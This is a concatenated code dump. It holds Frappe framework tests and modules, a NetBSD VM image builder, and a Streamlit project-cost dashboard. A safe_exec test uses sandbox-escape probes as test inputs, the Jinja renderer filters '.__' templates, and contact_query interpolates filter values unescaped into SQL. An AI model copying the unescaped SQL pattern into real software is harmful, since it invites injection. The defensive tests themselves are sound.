for d in frappe.get_all('ToDo', dict(reference_type = 'Note', owner = '<EMAIL>'), limit=5):
frappe.db.sql("delete from tabToDo where name = %s", d.name)
# add 5 more assignments
for i in range(5):
make_note(dict(public=1))
# check if each user still has 10 assignments
for user in ('<EMAIL>', '<EMAIL>', '<EMAIL>'):
self.assertEqual(len(frappe.get_all('ToDo', dict(owner = user, reference_type = 'Note'))), 10)
def test_assign_condition(self):
# check condition
note = make_note(dict(public=0))
self.assertEqual(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), None)
def test_clear_assignment(self):
note = make_note(dict(public=1))
# check if auto assigned to first user
todo = frappe.get_list('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
))[0]
todo = frappe.get_doc('ToDo', todo['name'])
self.assertEqual(todo.owner, '<EMAIL>')
# test auto unassign
note.public = 0
note.save()
todo.load_from_db()
# check if todo is cancelled
self.assertEqual(todo.status, 'Cancelled')
def test_close_assignment(self):
note = make_note(dict(public=1, content="valid"))
# check if auto assigned
todo = frappe.get_list('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
))[0]
todo = frappe.get_doc('ToDo', todo['name'])
self.assertEqual(todo.owner, '<EMAIL>')
note.content="Closed"
note.save()
todo.load_from_db()
# check if todo is closed
self.assertEqual(todo.status, 'Closed')
# check if closed todo retained assignment
self.assertEqual(todo.owner, '<EMAIL>')
def check_multiple_rules(self):
note = make_note(dict(public=1, notify_on_login=1))
# check if auto assigned to test3 (2nd rule is applied, as it has higher priority)
self.assertEqual(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), '<EMAIL>')
def check_assignment_rule_scheduling(self):
frappe.db.sql("DELETE FROM `tabAssignment Rule`")
days_1 = [dict(day = 'Sunday'), dict(day = 'Monday'), dict(day = 'Tuesday')]
days_2 = [dict(day = 'Wednesday'), dict(day = 'Thursday'), dict(day = 'Friday'), dict(day = 'Saturday')]
get_assignment_rule([days_1, days_2], ['public == 1', 'public == 1'])
frappe.flags.assignment_day = "Monday"
note = make_note(dict(public=1))
self.assertIn(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), ['<EMAIL>', '<EMAIL>', '<EMAIL>'])
frappe.flags.assignment_day = "Friday"
note = make_note(dict(public=1))
self.assertIn(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), ['<EMAIL>'])
def clear_assignments():
frappe.db.sql("delete from tabToDo where reference_type = 'Note'")
def get_assignment_rule(days, assign=None):
frappe.delete_doc_if_exists('Assignment Rule', 'For Note 1')
if not assign:
assign = ['public == 1', 'notify_on_login == 1']
assignment_rule = frappe.get_doc(dict(
name = 'For Note 1',
doctype = 'Assignment Rule',
priority = 0,
document_type = 'Note',
assign_condition = assign[0],
unassign_condition = 'public == 0 or notify_on_login == 1',
close_condition = '"Closed" in content',
rule = 'Round Robin',
assignment_days = days[0],
users = [
dict(user = '<EMAIL>'),
dict(user = '<EMAIL>'),
dict(user = '<EMAIL>'),
]
)).insert()
frappe.delete_doc_if_exists('Assignment Rule', 'For Note 2')
# 2nd rule
frappe.get_doc(dict(
name = 'For Note 2',
doctype = 'Assignment Rule',
priority = 1,
document_type = 'Note',
assign_condition = assign[1],
unassign_condition = 'notify_on_login == 0',
rule = 'Round Robin',
assignment_days = days[1],
users = [
dict(user = '<EMAIL>')
]
)).insert()
return assignment_rule
def make_note(values=None):
note = frappe.get_doc(dict(
doctype = 'Note',
title = random_string(10),
content = random_string(20)
))
if values:
note.update(values)
note.insert()
return note
```
#### File: doctype/contact/contact.py
```python
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr, has_gravatar
from frappe import _
from frappe.model.document import Document
from frappe.core.doctype.dynamic_link.dynamic_link import deduplicate_dynamic_links
from six import iteritems
from past.builtins import cmp
from frappe.model.naming import append_number_if_name_exists
from frappe.contacts.address_and_contact import set_link_title
import functools
class Contact(Document):
def autoname(self):
# concat first and last name
self.name = " ".join(filter(None,
[cstr(self.get(f)).strip() for f in ["first_name", "last_name"]]))
if frappe.db.exists("Contact", self.name):
self.name = append_number_if_name_exists('Contact', self.name)
# concat party name if reqd
for link in self.links:
self.name = self.name + '-' + link.link_name.strip()
break
def validate(self):
self.set_primary_email()
self.set_primary("phone")
self.set_primary("mobile_no")
self.set_user()
set_link_title(self)
if self.email_id and not self.image:
self.image = has_gravatar(self.email_id)
if self.get("sync_with_google_contacts") and not self.get("google_contacts"):
frappe.throw(_("Select Google Contacts to which contact should be synced."))
deduplicate_dynamic_links(self)
def set_user(self):
if not self.user and self.email_id:
self.user = frappe.db.get_value("User", {"email": self.email_id})
def get_link_for(self, link_doctype):
'''Return the link name, if exists for the given link DocType'''
for link in self.links:
if link.link_doctype==link_doctype:
return link.link_name
return None
def has_link(self, doctype, name):
for link in self.links:
if link.link_doctype==doctype and link.link_name== name:
return True
def has_common_link(self, doc):
reference_links = [(link.link_doctype, link.link_name) for link in doc.links]
for link in self.links:
if (link.link_doctype, link.link_name) in reference_links:
return True
def add_email(self, email_id, is_primary=0, autosave=False):
self.append("email_ids", {
"email_id": email_id,
"is_primary": is_primary
})
if autosave:
self.save(ignore_permissions=True)
def add_phone(self, phone, is_primary_phone=0, is_primary_mobile_no=0, autosave=False):
self.append("phone_nos", {
"phone": phone,
"is_primary_phone": is_primary_phone,
"is_primary_mobile_no": is_primary_mobile_no
})
if autosave:
self.save(ignore_permissions=True)
def set_primary_email(self):
if not self.email_ids:
self.email_id = ""
return
if len([email.email_id for email in self.email_ids if email.is_primary]) > 1:
frappe.throw(_("Only one {0} can be set as primary.").format(frappe.bold("Email ID")))
for d in self.email_ids:
if d.is_primary == 1:
self.email_id = d.email_id.strip()
break
def set_primary(self, fieldname):
# Used to set primary mobile and phone no.
if len(self.phone_nos) == 0:
setattr(self, fieldname, "")
return
field_name = "is_primary_" + fieldname
is_primary = [phone.phone for phone in self.phone_nos if phone.get(field_name)]
if len(is_primary) > 1:
frappe.throw(_("Only one {0} can be set as primary.").format(frappe.bold(frappe.unscrub(fieldname))))
for d in self.phone_nos:
if d.get(field_name) == 1:
setattr(self, fieldname, d.phone)
break
def get_default_contact(doctype, name):
'''Returns default contact for the given doctype, name'''
out = frappe.db.sql('''select parent,
(select is_primary_contact from tabContact c where c.name = dl.parent)
as is_primary_contact
from
`tabDynamic Link` dl
where
dl.link_doctype=%s and
dl.link_name=%s and
dl.parenttype = "Contact"''', (doctype, name))
if out:
return sorted(out, key = functools.cmp_to_key(lambda x,y: cmp(y[1], x[1])))[0][0]
else:
return None
@frappe.whitelist()
def invite_user(contact):
contact = frappe.get_doc("Contact", contact)
if not contact.email_id:
frappe.throw(_("Please set Email Address"))
if contact.has_permission("write"):
user = frappe.get_doc({
"doctype": "User",
"first_name": contact.first_name,
"last_name": contact.last_name,
"email": contact.email_id,
"user_type": "Website User",
"send_welcome_email": 1
}).insert(ignore_permissions = True)
return user.name
@frappe.whitelist()
def get_contact_details(contact):
contact = frappe.get_doc("Contact", contact)
out = {
"contact_person": contact.get("name"),
"contact_display": " ".join(filter(None,
[contact.get("salutation"), contact.get("first_name"), contact.get("last_name")])),
"contact_email": contact.get("email_id"),
"contact_mobile": contact.get("mobile_no"),
"contact_phone": contact.get("phone"),
"contact_designation": contact.get("designation"),
"contact_department": contact.get("department")
}
return out
def update_contact(doc, method):
'''Update contact when user is updated, if contact is found. Called via hooks'''
contact_name = frappe.db.get_value("Contact", {"email_id": doc.name})
if contact_name:
contact = frappe.get_doc("Contact", contact_name)
for key in ("first_name", "last_name", "phone"):
if doc.get(key):
contact.set(key, doc.get(key))
contact.flags.ignore_mandatory = True
contact.save(ignore_permissions=True)
def contact_query(doctype, txt, searchfield, start, page_len, filters):
from frappe.desk.reportview import get_match_cond
link_doctype = filters.pop('link_doctype')
link_name = filters.pop('link_name')
condition = ""
for fieldname, value in iteritems(filters):
condition += " and {field}={value}".format(
field=fieldname,
value=value
)
return frappe.db.sql("""select
`tabContact`.name, `tabContact`.first_name, `tabContact`.last_name
from
`tabContact`, `tabDynamic Link`
where
`tabDynamic Link`.parent = `tabContact`.name and
`tabDynamic Link`.parenttype = 'Contact' and
`tabDynamic Link`.link_doctype = %(link_doctype)s and
`tabDynamic Link`.link_name = %(link_name)s and
`tabContact`.`{key}` like %(txt)s
{mcond}
order by
if(locate(%(_txt)s, `tabContact`.name), locate(%(_txt)s, `tabContact`.name), 99999),
`tabContact`.idx desc, `tabContact`.name
limit %(start)s, %(page_len)s """.format(
mcond=get_match_cond(doctype),
key=searchfield), {
'txt': '%' + txt + '%',
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len,
'link_name': link_name,
'link_doctype': link_doctype
})
@frappe.whitelist()
def address_query(links):
import json
links = [{"link_doctype": d.get("link_doctype"), "link_name": d.get("link_name")} for d in json.loads(links)]
result = []
for link in links:
if not frappe.has_permission(doctype=link.get("link_doctype"), ptype="read", doc=link.get("link_name")):
continue
res = frappe.db.sql("""
SELECT `tabAddress`.name
FROM `tabAddress`, `tabDynamic Link`
WHERE `tabDynamic Link`.parenttype='Address'
AND `tabDynamic Link`.parent=`tabAddress`.name
AND `tabDynamic Link`.link_doctype = %(link_doctype)s
AND `tabDynamic Link`.link_name = %(link_name)s
""", {
"link_doctype": link.get("link_doctype"),
"link_name": link.get("link_name"),
}, as_dict=True)
result.extend([l.name for l in res])
return result
def get_contact_with_phone_number(number):
if not number: return
contacts = frappe.get_all('Contact Phone', filters=[
['phone', 'like', '%{0}'.format(number)]
], fields=["parent"], limit=1)
return contacts[0].parent if contacts else None
def get_contact_name(email_id):
contact = frappe.get_list("Contact Email", filters={"email_id": email_id}, fields=["parent"], limit=1)
return contact[0].parent if contact else None
```
#### File: doctype/role/role.py
```python
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class Role(Document):
def before_rename(self, old, new, merge=False):
if old in ("Guest", "Administrator", "System Manager", "All"):
frappe.throw(frappe._("Standard roles cannot be renamed"))
def after_insert(self):
frappe.cache().hdel('roles', 'Administrator')
def validate(self):
if self.disabled:
if self.name in ("Guest", "Administrator", "System Manager", "All"):
frappe.throw(frappe._("Standard roles cannot be disabled"))
else:
frappe.db.sql("delete from `tabHas Role` where role = %s", self.name)
frappe.clear_cache()
# Get email addresses of all users that have been assigned this role
def get_emails_from_role(role):
emails = []
users = frappe.get_list("Has Role", filters={"role": role, "parenttype": "User"},
fields=["parent"])
for user in users:
user_email, enabled = frappe.db.get_value("User", user.parent, ["email", "enabled"])
if enabled and user_email not in ["<EMAIL>", "<EMAIL>"]:
emails.append(user_email)
return emails
```
#### File: frappe/tests/test_safe_exec.py
```python
from __future__ import unicode_literals
import unittest
from frappe.utils.safe_exec import safe_exec
class TestSafeExec(unittest.TestCase):
def test_import_fails(self):
self.assertRaises(ImportError, safe_exec, 'import os')
def test_internal_attributes(self):
self.assertRaises(SyntaxError, safe_exec, '().__class__.__call__')
```
#### File: frappe/utils/jinja.py
```python
from __future__ import unicode_literals
def get_jenv():
import frappe
from frappe.utils.safe_exec import get_safe_globals
if not getattr(frappe.local, 'jenv', None):
from jinja2 import DebugUndefined
from jinja2.sandbox import SandboxedEnvironment
# frappe will be loaded last, so app templates will get precedence
jenv = SandboxedEnvironment(loader = get_jloader(),
undefined=DebugUndefined)
set_filters(jenv)
jenv.globals.update(get_safe_globals())
jenv.globals.update(get_jenv_customization('methods'))
frappe.local.jenv = jenv
return frappe.local.jenv
def get_template(path):
return get_jenv().get_template(path)
def get_email_from_template(name, args):
from jinja2 import TemplateNotFound
args = args or {}
try:
message = get_template('templates/emails/' + name + '.html').render(args)
except TemplateNotFound as e:
raise e
try:
text_content = get_template('templates/emails/' + name + '.txt').render(args)
except TemplateNotFound:
text_content = None
return (message, text_content)
def validate_template(html):
"""Throws exception if there is a syntax error in the Jinja Template"""
import frappe
from jinja2 import TemplateSyntaxError
jenv = get_jenv()
try:
jenv.from_string(html)
except TemplateSyntaxError as e:
frappe.msgprint('Line {}: {}'.format(e.lineno, e.message))
frappe.throw(frappe._("Syntax error in template"))
def render_template(template, context, is_path=None, safe_render=True):
'''Render a template using Jinja
:param template: path or HTML containing the jinja template
:param context: dict of properties to pass to the template
:param is_path: (optional) assert that the `template` parameter is a path
:param safe_render: (optional) prevent server side scripting via jinja templating
'''
from frappe import get_traceback, throw
from jinja2 import TemplateError
if not template:
return ""
# if it ends with .html then its a freaking path, not html
if (is_path
or template.startswith("templates/")
or (template.endswith('.html') and '\n' not in template)):
return get_jenv().get_template(template).render(context)
else:
if safe_render and ".__" in template:
throw("Illegal template")
try:
return get_jenv().from_string(template).render(context)
except TemplateError:
throw(title="Jinja Template Error", msg="<pre>{template}</pre><pre>{tb}</pre>".format(template=template, tb=get_traceback()))
def get_jloader():
import frappe
if not getattr(frappe.local, 'jloader', None):
from jinja2 import ChoiceLoader, PackageLoader, PrefixLoader
if frappe.local.flags.in_setup_help:
apps = ['frappe']
else:
apps = frappe.get_hooks('template_apps')
if not apps:
apps = frappe.local.flags.web_pages_apps or frappe.get_installed_apps(sort=True)
apps.reverse()
if not "frappe" in apps:
apps.append('frappe')
frappe.local.jloader = ChoiceLoader(
# search for something like app/templates/...
[PrefixLoader(dict(
(app, PackageLoader(app, ".")) for app in apps
))]
# search for something like templates/...
+ [PackageLoader(app, ".") for app in apps]
)
return frappe.local.jloader
def set_filters(jenv):
import frappe
from frappe.utils import global_date_format, cint, cstr, flt, markdown
from frappe.website.utils import get_shade, abs_url
jenv.filters["global_date_format"] = global_date_format
jenv.filters["markdown"] = markdown
jenv.filters["json"] = frappe.as_json
jenv.filters["get_shade"] = get_shade
jenv.filters["len"] = len
jenv.filters["int"] = cint
jenv.filters["str"] = cstr
jenv.filters["flt"] = flt
jenv.filters["abs_url"] = abs_url
if frappe.flags.in_setup_help:
return
jenv.filters.update(get_jenv_customization('filters'))
def get_jenv_customization(customization_type):
'''Returns a dict with filter/method name as key and definition as value'''
import frappe
out = {}
if not getattr(frappe.local, "site", None):
return out
values = frappe.get_hooks("jenv", {}).get(customization_type)
if not values:
return out
for value in values:
fn_name, fn_string = value.split(":")
out[fn_name] = frappe.get_attr(fn_string)
return out
``` |
{
"source": "jimmyrincon/netbsd-gce",
"score": 2
} |
#### File: jimmyrincon/netbsd-gce/mkvm.py
```python
import anita
import ftplib
import sys
def find_latest_release(branch, arch):
"""Find the latest NetBSD-current release for the given arch.
Returns:
the full path to the release.
"""
conn = ftplib.FTP('nyftp.netbsd.org')
conn.login()
conn.cwd('/pub/NetBSD-daily/%s' % branch)
releases = conn.nlst()
releases.sort(reverse=True)
for r in releases:
archs = conn.nlst(r)
if not archs:
next
has_arch = [a for a in archs if a.endswith(arch)]
if has_arch:
return "https://nycdn.netbsd.org/pub/NetBSD-daily/%s/%s/" % (branch, has_arch[0])
arch = sys.argv[1]
branch = sys.argv[2]
commands = [
"""cat > /etc/ifconfig.vioif0 << EOF
!dhcpcd vioif0
mtu 1460
EOF""",
"dhcpcd",
"""ed /etc/fstab << EOF
H
%s/wd0/sd0/
wq
EOF""",
"sync; shutdown -hp now",
]
a = anita.Anita(
anita.URL(find_latest_release(branch, arch)),
workdir="work-%s-%s" % (branch, arch),
disk_size="4G",
memory_size = "1G",
persist=True)
child = a.boot()
anita.login(child)
for cmd in commands:
anita.shell_cmd(child, cmd, 1200)
# Sometimes, the halt command times out, even though it has completed
# successfully.
try:
a.halt()
except:
pass
``` |
{
"source": "jimmys29/Plex",
"score": 2
} |
#### File: jimmys29/Plex/plex.py
```python
import streamlit as st
# EDA Pkgs
import pandas as pd
import codecs
import plotly.express as px
import altair as alt
from PIL import Image
# Components Pkgs
import streamlit.components.v1 as components
# Custome Component Fxn
import sweetviz as sv
st.set_page_config(
page_title="DASHBOARD PLEX",
page_icon="https://www.telefonica.com/documents/20195/146013668/telefonica-logo-azul.png/03c9a0c0-57eb-eb53-5649-79e382fd4965?t=1618483185177",
layout="wide",
initial_sidebar_state="expanded")
image = Image.open('TelefonicaL.jpg')
# rutimage = ""<img src="https://www.w3schools.com/howto/img_nature_wide.jpg" style="width:100%">""
# image= st.image("<img src=rutimage; style="width:100%">")
img = st.sidebar.image(image)
def st_display_sweetviz(report_html, width=1000, height=500):
report_file = codecs.open(report_html, 'r')
page = report_file.read()
components.html(page, width=width, height=height, scrolling=True)
footer_temp = """
<!-- CSS -->
<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<link href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css" type="text/css" rel=
"stylesheet"media="screen,projection"/>
<link href="static/css/style.css" type="text/css" rel="stylesheet" media="screen,projection"/>
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.5.0/css/all.css" integrity=
"<KEY>" crossorigin="anonymous">
<footer class="page-footer grey darken-4">
<div class="container" id="aboutapp">
<div class="row">
<div class="col l6 s12">
<h5 class="white-text">About Causacion Telefonica PlEx App</h5>
<p class="grey-text text-lighten-4">Using Streamlit.</p>
</div>
<div class="col l3 s12">
<h5 class="white-text">Connect With Me</h5>
<ul>
<a href=""https://www.telefonica.com/documents/20195/146016182/facebook-icon.png/752bd9ce-a2cf-8ccf-c906-ae9172935ea4?t=1619084036934"">
<i class="fab fa-facebook fa-4x"></i>
</a>
<a href="https://www.linkedin.com/in/jaime-espindola-a5833447/" target="_blank" class="white-text">
<i class="fab fa-linkedin fa-4x"></i>
</a>
<a href="https://www.telefonica.com/documents/20195/146016182/youtube-icon.png/8dd29ebe-b03d-dd41-7ccc-a30b51f95b76?t=1619084037794" target="_blank" class="white-text">
<i class="fab fa-youtube-square fa-4x"></i>
</a>
<a href="https://www.telefonica.com/documents/20195/146016182/instagram-icon.png/51b9aca8-3e54-fe2e-4946-bed8501584b9?t=1619084037303" target="_blank" class="white-text">
<i class="fab fa-github-square fa-4x"></i>
</a>
</ul>
</div>
</div>
</div>
<div class="footer-copyright">
<div class="container">
Made by, <a class="white-text text-lighten-3" href="https://www.telefonica.com/es/home"> <NAME></a><br/>
<a class="white-text text-lighten-3" href="https://www.telefonica.com/es/home">@<NAME></a>
</div>
</div>
</footer>
"""
html_temp = """
<div style="background-color:royalblue;padding:1px;border-radius:1px">
<h1 style="color:white;text-align:center;">DashBoard Causacion PlEx</h1>
</div>
"""
# T1 = st.title("<h1 style='text-align: center;background:royalblue; color: white;'>Dash Board Causacion PlEx</h1>", "Dash")
def archivo():
st.sidebar.title("Seleccione Archivo DashBoard")
data_file = st.sidebar.file_uploader(" ", type=['xlsx'])
return data_file
def main():
"""DASH BOARD TELEFONICA PLEX"""
st.sidebar.title("<h4 style='text-align: right ;font-size=50; color: red;'>Seleccione archivo Origen</h4>", "File")
data_file = st.sidebar.file_uploader(" ", type=['xlsx'])
menu = ["Home", "Jefatura", "Anillo Antioquia", "Ftth", "Transformacion IP", "Banagrario", "About"]
choice = st.sidebar.selectbox("Menu Proyectos", menu)
st.title("<h4 style='text-align: right ;font-size=50; color: darkblue;'>Choise Proyect of Menu</h4>", "File")
# OPCIONES A GRAFICAR
tile_x = st.sidebar.selectbox(label="Seleccione Opcion Eje_X",
options=["PROYECTO", "SITIO", "GESTOR", "REGIONAL", "ID_PTO", "MES"],
index=0)
opcion = st.sidebar.radio("Seleccione Opcion Eje_Y", ["COSTO", "CANTIDAD"])
if not opcion:
st.error("Por favor seleccione Una Opcion")
def op( ):
if opcion == "COSTO":
opt = 'TOTAL'
elif opcion == "CANTIDAD":
opt = 'CANTIDAD'
return opt
tile_y = op()
tile_col = st.sidebar.radio("Seleccione Opcion Color", ["GRUPO", "CONTRATO", "EQUIPO", "PROYECTO"])
if data_file is not None:
dfup = pd.read_excel(data_file)
# dfup = dfap[dfap['GRUPO'].dropna()]
if choice == "Jefatura":
st.subheader("Jefatura")
# Selection para interaccion
selector = alt.selection(type="single", empty='none')
# Grafico General
if st.checkbox('Ver Grafica Consolidado', menu):
# st.line_chart(dfup) # mostrar barra lateral
Graf_Jef = alt.Chart(dfup).mark_boxplot(size=50, extent=3.0) \
.encode(x=alt.X(tile_x, title=tile_x),
y=alt.Y(tile_y, title=tile_y), color=tile_col, size='TIPO',
tooltip=['TIPO', 'TIPO', 'TOTAL', tile_y]).add_selection(
selector).interactive().properties(width=500, height=300)
fig = px.histogram(dfup, x=tile_x, y=tile_y, color=tile_col,
hover_data=['TIPO', 'ID_PTO', 'GESTOR'], labels={'TOTAL': 'TOTAL CAUSADO'})
st.plotly_chart(fig)
# Graf_Jef
text = Graf_Jef.mark_text(align='left', baseline='middle', dx=3, font="Courier",
fontSize=1).encode(text='TOTAL', size=alt.value(7))
# fig = fig.add_trace(go.Funnel( dfup , x=tile_x , y=tile_y , color=tile_col ,
# labels={'TOTAL': 'TOTAL CAUSADO'} )
# st.plotly_chart ( fig )
if st.checkbox('Mostrar Tabla de Datos'):
st.write(dfup)
if st.button("Generate Report"):
# Normal Workflow
report = sv.analyze(dfup)
report.show_html()
st_display_sweetviz("SWEETVIZ_REPORT.html")
if choice == "Anillo Antioquia":
st.subheader("Anillo Antioquia")
dfpr = dfup[(dfup['PROYECTO'] == 'ANILLO ANTIOQUIA')]
tot = dfup.groupby(['PROYECTO'])['PROYECTO', 'TOTAL'].sum()
# Tot = dfup [ 'TOTAL' ].apply ( np.sum )
# Selection para interaccion
selector = alt.selection(type="single", empty='none')
multi = alt.selection_multi()
# Grafico General
if st.checkbox('Ver Grafica Proyecto Anillo Antioquia', menu):
# st.line_chart(data()) # mostrar barra lateral
Graf_Proy = alt.Chart(dfpr).mark_bar(size=500 , cornerRadiusTopLeft=20) \
.encode ( x=alt.X(tile_x, title=tile_x),
y=alt.Y(tile_y, title=tile_y), color=tile_col, size='TIPO',
tooltip=['TIPO', 'TIPO', 'TOTAL', tile_y]) \
.add_selection(selector).interactive()
# Graf_otr = alt.Chart ( dfpr ).transform_joinaggregate (TotalTOTAL='sum(TOTAL)' ,).transform_calculate(PercentOfTotal="datum.TOTAL / datum.TotalTOTAL").mark_bar().encode(alt.X('PercentOfTotal:Q', axis=alt.Axis(format='.0%')),y='GRUPO:N', color=tile_col)
fig = px.histogram(dfpr, x=tile_x, y=tile_y, color=tile_col,
hover_data=['TIPO', 'ID_PTO', 'GESTOR'], labels={'TOTAL': 'TOTAL CAUSADO'})
st.plotly_chart(fig)
text = Graf_Proy.mark_text(align='left', baseline='middle', dy=.1, font="Courier", fontSize=1,
angle=270).encode(text='TOTAL', size=alt.value(7))
# Graf_Proy
if st.checkbox('Mostrar Tabla de Datos'):
st.write(dfpr)
if st.button("Generate Report"):
# Normal Workflow
report = sv.analyze(dfpr)
report.show_html()
st_display_sweetviz("SWEETVIZ_REPORT.html")
dfup = pd.read_excel ( data_file )
if choice == "Transformacion IP":
st.subheader ( "Transformacion IP" )
dfpr = dfup [ (dfup [ 'PROYECTO' ] == 'TRANSFORMACION IP') ]
# Selection para interaccion
selector = alt.selection ( type="single" , empty='none' )
# Grafico General
if st.checkbox ( 'Ver Grafica Proyecto' , menu ):
# st.line_chart(data()) # mostrar barra lateral
Graf_Proy = alt.Chart ( dfpr ).mark_bar ( size=50 ) \
.encode ( x=alt.X ( tile_x , title=tile_x ) ,
y=alt.Y ( tile_y , title=tile_y ) , color=tile_col , size='TIPO' ,
tooltip=[ 'TIPO' , 'TIPO' , 'TOTAL' , tile_y ] ) \
.add_selection ( selector ).interactive ()
fig = px.histogram ( dfpr , x=tile_x , y=tile_y , color=tile_col , )
st.plotly_chart ( fig )
st.write ( Graf_Proy )
if st.checkbox ( 'Mostrar Tabla de Datos' ):
st.write ( dfpr )
if st.button ( "Generate Report" ):
# Normal Workflow
report = sv.analyze ( dfpr )
report.show_html ()
st_display_sweetviz ( "SWEETVIZ_REPORT.html" )
if choice == "Ftth":
st.subheader ( "Ftth" )
dfpr = dfup [ (dfup [ 'PROYECTO' ] == 'FTTH') ]
# Selection para interaccion
selector = alt.selection ( type="single" , empty='none' )
# Grafico General
if st.checkbox ( 'Ver Grafica Proyecto' , menu ):
# st.line_chart(data()) # mostrar barra lateral
Graf_Proy = alt.Chart ( dfpr ).mark_bar ( size=50 ) \
.encode ( x=alt.X ( tile_x , title=tile_x ) ,
y=alt.Y ( tile_y , title=tile_y ) , color=tile_col , size='TIPO' ,
tooltip=[ 'TIPO' , 'TIPO' , 'TOTAL' , tile_y ] ) \
.add_selection ( selector ).interactive ()
fig = px.histogram ( dfpr , x=tile_x , y=tile_y , color=tile_col ,
hover_data=[ 'TIPO' , 'ID_PTO' , 'GESTOR' ] , labels={'TOTAL': 'TOTAL CAUSADO'} )
st.plotly_chart ( fig )
# Graf_Proy
if st.checkbox ( 'Mostrar Tabla de Datos' ):
st.write ( dfpr )
if st.button ( "Generate Report" ):
# Normal Workflow
report = sv.analyze ( dfpr )
report.show_html ()
st_display_sweetviz ( "SWEETVIZ_REPORT.html" )
if choice == "Banagrario":
st.subheader ( "Banagrario" )
dfpr = dfup [ (dfup [ 'PROYECTO' ] == 'BANAGRARIO') ]
# Selection para interaccion
selector = alt.selection ( type="single" , empty='none' )
# Grafico General
if st.checkbox ( 'Ver Grafica Proyecto' , menu ):
# st.line_chart(data()) # mostrar barra lateral
Graf_Proy = alt.Chart ( dfpr ).mark_bar ( size=50 ) \
.encode ( x=alt.X ( tile_x , title=tile_x ) ,
y=alt.Y ( tile_y , title=tile_y ) , color=tile_col , size='TIPO' ,
tooltip=[ 'TIPO' , 'TIPO' , 'TOTAL' , tile_y ] ) \
.add_selection ( selector ).interactive ()
fig = px.histogram ( dfpr , x=tile_x , y=tile_y , color=tile_col ,
hover_data=[ 'TIPO' , 'ID_PTO' , 'GESTOR' ] , labels={'TOTAL': 'TOTAL CAUSADO'} )
st.plotly_chart ( fig )
# Graf_Proy
if st.checkbox ( 'Mostrar Tabla de Datos' ):
st.write ( dfpr )
if st.button ( "Generate Report" ):
# Normal Workflow
report = sv.analyze ( dfpr )
report.show_html ()
st_display_sweetviz ( "SWEETVIZ_REPORT.html" )
elif choice == "About":
st.subheader ( "About DashBoard" )
# components.iframe('https://telefonica.com')
components.html ( footer_temp , height=500 )
else:
st.subheader ( "Home" )
# components.html("<p style='color:red;'> Streamlit Components is Awesome</p>")
components.html ( html_temp )
components.html ( """
<style>
* {box-sizing: border-box}
body {font-family: Verdana, sans-serif; margin:0}
.mySlides {display: none}
img {vertical-align: middle;}
/* Slideshow container */
.slideshow-container {
max-width: 1000px;
position: relative;
margin: auto;
}
/* Next & previous buttons */
.prev, .next {
cursor: pointer;
position: absolute;
top: 50%;
width: auto;
padding: 16px;
margin-top: -22px;
color: white;
font-weight: bold;
font-size: 18px;
transition: 0.6s ease;
border-radius: 0 3px 3px 0;
user-select: none;
}
/* Position the "next button" to the right */
.next {
right: 0;
border-radius: 3px 0 0 3px;
}
/* On hover, add a black background color with a little bit see-through */
.prev:hover, .next:hover {
background-color: rgba(0,0,0,0.8);
}
/* Caption text */
.text {
color: #f2f2f2;
font-size: 15px;
padding: 8px 12px;
position: absolute;
bottom: 8px;
width: 100%;
text-align: center;
}
/* Number text (1/3 etc) */
.numbertext {
color: #f2f2f2;
font-size: 12px;
padding: 8px 12px;
position: absolute;
top: 0;
}
/* The dots/bullets/indicators */
.dot {
cursor: pointer;
height: 15px;
width: 15px;
margin: 0 2px;
background-color: #bbb;
border-radius: 50%;
display: inline-block;
transition: background-color 0.6s ease;
}
.active, .dot:hover {
background-color: #717171;
}
/* Fading animation */
.fade {
-webkit-animation-name: fade;
-webkit-animation-duration: 1.5s;
animation-name: fade;
animation-duration: 1.5s;
}
@-webkit-keyframes fade {
from {opacity: .4}
to {opacity: 1}
}
@keyframes fade {
from {opacity: .4}
to {opacity: 1}
}
/* On smaller screens, decrease text size */
@media only screen and (max-width: 300px) {
.prev, .next,.text {font-size: 11px}
}
</style>
</head>
<body>
<div class="slideshow-container">
<div class="mySlides fade">
<div class="numbertext">1 / 5</div>
<img src="https://www.w3schools.com/howto/img_5terre_wide.jpg" style="width:100%">
<div class="text">Caption Text</div>
</div>
<div class="mySlides fade">
<div class="numbertext">2 / 5</div>
<img src="https://www.w3schools.com/howto/img_nature_wide.jpg" style="width:100%">
<div class="text">Caption Text</div>
</div>
<div class="mySlides fade">
<div class="numbertext">3 / 5</div>
<img src="https://www.w3schools.com/howto/img_snow_wide.jpg" style="width:100%">
<div class="text">Caption Two</div>
</div>
<div class="mySlides fade">
<div class="numbertext">4 / 5</div>
<img src="https://www.w3schools.com/howto/img_mountains_wide.jpg" style="width:100%">
<div class="text">Caption Three</div>
</div>
<div class="mySlides fade">
<div class="numbertext">5 / 5</div>
<img src="https://www.w3schools.com/howto/img_lights_wide.jpg" style="width:100%">
<div class="text">Caption Three</div>
</div>
<a class="prev" onclick="plusSlides(-1)">❮</a>
<a class="next" onclick="plusSlides(1)">❯</a>
</div>
<br>
<div style="text-align:center">
<span class="dot" onclick="currentSlide(1)"></span>
<span class="dot" onclick="currentSlide(2)"></span>
<span class="dot" onclick="currentSlide(3)"></span>
</div>
<script>
var slideIndex = 1;
showSlides(slideIndex);
function plusSlides(n) {
showSlides(slideIndex += n);
}
function currentSlide(n) {
showSlides(slideIndex = n);
}
function showSlides(n) {
var i;
var slides = document.getElementsByClassName("mySlides");
var dots = document.getElementsByClassName("dot");
if (n > slides.length) {slideIndex = 1}
if (n < 1) {slideIndex = slides.length}
for (i = 0; i < slides.length; i++) {
slides[i].style.display = "none";
}
for (i = 0; i < dots.length; i++) {
dots[i].className = dots[i].className.replace(" active", "");
}
slides[slideIndex-1].style.display = "block";
dots[slideIndex-1].className += " active";
}
